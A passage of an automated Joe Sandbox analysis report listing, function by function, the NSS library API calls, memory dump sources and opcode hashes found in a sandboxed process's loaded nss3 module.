                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E3183B5A102169FDB04DF65C851ABFBBF9EF85248B20442DD905E7750EB31D905CBA0
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6CF74F5D
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CF74F74
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CF74F82
                                                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6CF74F90
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: free$CreateErrorFileLast
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 17951984-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 170dfb8f575ffb89d4a3743594921119ac6dacc280904c274dbafa994fa884e8
                                                                                                                                                                                                                                                                                                                      • Instruction ID: ba4c76305dd06833a40acdd56126c4ca700b0c6dc11c5ef395e045b01c897b2f
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 170dfb8f575ffb89d4a3743594921119ac6dacc280904c274dbafa994fa884e8
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD312B75B002094BDB11DB69EC81BDFB7B8EF45358F04022AEC15A7681D73499058AB1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_MillisecondsToInterval.NSS3(?), ref: 6CED6E36
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CED6E57
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF0C2BF
                                                                                                                                                                                                                                                                                                                      • PR_MillisecondsToInterval.NSS3(?), ref: 6CED6E7D
                                                                                                                                                                                                                                                                                                                      • PR_MillisecondsToInterval.NSS3(?), ref: 6CED6EAA
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: IntervalMilliseconds$ErrorValue
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3163584228-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 889c46b91e4e33aefd7e643e0ed412486615350a2b84260c12a79a96f0a12920
                                                                                                                                                                                                                                                                                                                      • Instruction ID: d76977d1165e7c63c58d131e57ee33ecabb45df67f3fb9c3f3749d25edb0a95d
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 889c46b91e4e33aefd7e643e0ed412486615350a2b84260c12a79a96f0a12920
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A318E71610513AADB145E74D804396B7B8AB0131EF320A3DDC9AD7B40EB317656CB92
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6CEBDDB1,?,00000000), ref: 6CEBDDF4
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: TlsGetValue.KERNEL32 ref: 6CEC14E0
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: EnterCriticalSection.KERNEL32 ref: 6CEC14F5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: PR_Unlock.NSS3 ref: 6CEC150D
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6CEBDDB1,?,00000000), ref: 6CEBDE0B
                                                                                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6CEBDDB1,?,00000000), ref: 6CEBDE17
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0BE0: malloc.MOZGLUE(6CEB8D2D,?,00000000,?), ref: 6CEC0BF8
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0BE0: TlsGetValue.KERNEL32(6CEB8D2D,?,00000000,?), ref: 6CEC0C15
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE009,00000000), ref: 6CEBDE80
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3725328900-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                                                                                                                                                                                                                                                                                      • Instruction ID: d96ecfd1b5cfaa17ccdb699f48ed8a459ad5ce0db7f443218c769ec0f7e5a540
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5731B5B5E017429BE700CF56C9C0662B7B4BFA531CB34822EE81997B05E770E5A4CB91
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(6CE85ADC,?,00000000,00000001,?,?,00000000,?,6CE7BA55,?,?), ref: 6CEAFE4B
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CEAFE5F
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(78831D74), ref: 6CEAFEC2
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6CEAFED6
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 284873373-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: e372f29bcd86ce36fd880911633cdc95778a55aee5d8f56e8c45d74b59d6cf41
                                                                                                                                                                                                                                                                                                                      • Instruction ID: d9d954e96eb044715a595fecd36c2f8c616955dfe13430eff8fb9f49c3d225e5
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e372f29bcd86ce36fd880911633cdc95778a55aee5d8f56e8c45d74b59d6cf41
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63212031E00225AFDB50AFA4D8447ABB7B4BF0536CF248124EC046BF42E339A925CBD1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB3440: PK11_GetAllTokens.NSS3 ref: 6CEB3481
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB3440: PR_SetError.NSS3(00000000,00000000), ref: 6CEB34A3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB3440: TlsGetValue.KERNEL32 ref: 6CEB352E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB3440: EnterCriticalSection.KERNEL32(?), ref: 6CEB3542
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB3440: PR_Unlock.NSS3(?), ref: 6CEB355B
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6CE9E80C,00000000,00000000,?,?,?,?,6CEA8C5B,-00000001), ref: 6CEB3FA1
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6CE9E80C,00000000,00000000,?,?,?,?,6CEA8C5B,-00000001), ref: 6CEB3FBA
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,00000000,00000000,00000000,?,6CE9E80C,00000000,00000000,?,?,?,?,6CEA8C5B,-00000001), ref: 6CEB3FFE
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3 ref: 6CEB401A
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalEnterErrorSectionUnlockValue$K11_Tokens
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3021504977-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 5d3d53af6c240e236886d2cc61bccc4a7b40eaa6caab36a4b46256b83cd85057
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 3ceed788ed3e08b3c4c3a30cd50fe8505be4b9b723d5620f6f73569c02796703
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d3d53af6c240e236886d2cc61bccc4a7b40eaa6caab36a4b46256b83cd85057
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0316070A047048FD741AF69D5846BABBF0FF89358F11592ED88997B10EB30E985CB92
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6CEAB60F,00000000), ref: 6CEA5003
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6CEAB60F,00000000), ref: 6CEA501C
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6CEAB60F,00000000), ref: 6CEA504B
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?,00000000,00000000,00000000,?,6CEAB60F,00000000), ref: 6CEA5064
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalEnterSectionUnlockValuefree
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1112172411-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: a49fb5832bf5912b60b993d5c1d89b3b34d4d480f3924cef078036d958d21224
                                                                                                                                                                                                                                                                                                                      • Instruction ID: fffe4d42bcaa8406304012a2dbcb8275a9a342a3c0a595531b859e34c2d36b37
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a49fb5832bf5912b60b993d5c1d89b3b34d4d480f3924cef078036d958d21224
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 653129B4A05A068FDB40EF69C4C466ABBF4FF08308F118569D859DB701E770E991CB91
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?,6CECA71A,FFFFFFFF,?,?), ref: 6CEC9FAB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: TlsGetValue.KERNEL32 ref: 6CEC14E0
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: EnterCriticalSection.KERNEL32 ref: 6CEC14F5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: PR_Unlock.NSS3 ref: 6CEC150D
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaGrow_Util.NSS3(?,?,?,00000000,6CECA71A,6CECA71A,00000000), ref: 6CEC9FD9
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CE6895A,00000000,?,00000000,?,00000000,?,00000000,?,6CE5F599,?,00000000), ref: 6CEC136A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6CE6895A,00000000,?,00000000,?,00000000,?,00000000,?,6CE5F599,?,00000000), ref: 6CEC137E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC1340: PL_ArenaGrow.NSS3(?,6CE5F599,?,00000000,?,6CE6895A,00000000,?,00000000,?,00000000,?,00000000,?,6CE5F599,?), ref: 6CEC13CF
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC1340: PR_Unlock.NSS3(?,?,6CE6895A,00000000,?,00000000,?,00000000,?,00000000,?,6CE5F599,?,00000000), ref: 6CEC145C
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000008,6CECA71A,6CECA71A,00000000), ref: 6CECA009
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000,6CECA71A,6CECA71A,00000000), ref: 6CECA045
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Arena$Util$CriticalEnterSectionUnlockValue$Alloc_ErrorGrowGrow_Mark_
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3535121653-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 6d1ae70d6311bc2b933261b9cebe50cfeb7780cc980ad09fb36ff6f910e61e20
                                                                                                                                                                                                                                                                                                                      • Instruction ID: c3df26dee39767154523e2507ce6c58ba757833ab212de77c12c9dd455041cdb
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d1ae70d6311bc2b933261b9cebe50cfeb7780cc980ad09fb36ff6f910e61e20
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 362180B4740206ABE7009F55DD51F66B7B9BB8539CF20822C983987B81EB75E814CB92
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6CED2E08
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: TlsGetValue.KERNEL32 ref: 6CEC14E0
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: EnterCriticalSection.KERNEL32 ref: 6CEC14F5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: PR_Unlock.NSS3 ref: 6CEC150D
                                                                                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000400), ref: 6CED2E1C
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6CED2E3B
                                                                                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CED2E95
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CE688A4,00000000,00000000), ref: 6CEC1228
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6CEC1238
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CE688A4,00000000,00000000), ref: 6CEC124B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC1200: PR_CallOnce.NSS3(6CFC2AA4,6CEC12D0,00000000,00000000,00000000,?,6CE688A4,00000000,00000000), ref: 6CEC125D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6CEC126F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6CEC1280
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6CEC128E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6CEC129A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6CEC12A1
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1441289343-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 9eea7c1ded8b5929c6be0a0e432c2373a930dfd2ba3f373995881bae73a28465
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C21F9B1E003464BE701CF549D447AA37746FE134CF320269DD185B742F7B2F9958292
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • CERT_NewCertList.NSS3 ref: 6CE8ACC2
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE62F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CE62F0A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE62F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CE62F1D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE62AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6CE60A1B,00000000), ref: 6CE62AF0
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE62AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE62B11
                                                                                                                                                                                                                                                                                                                      • CERT_DestroyCertList.NSS3(00000000), ref: 6CE8AD5E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CE6B41E,00000000,00000000,?,00000000,?,6CE6B41E,00000000,00000000,00000001,?), ref: 6CEA57E0
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CEA5843
                                                                                                                                                                                                                                                                                                                      • CERT_DestroyCertList.NSS3(?), ref: 6CE8AD36
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE62F50: CERT_DestroyCertificate.NSS3(?), ref: 6CE62F65
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE62F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CE62F83
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CE8AD4F
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
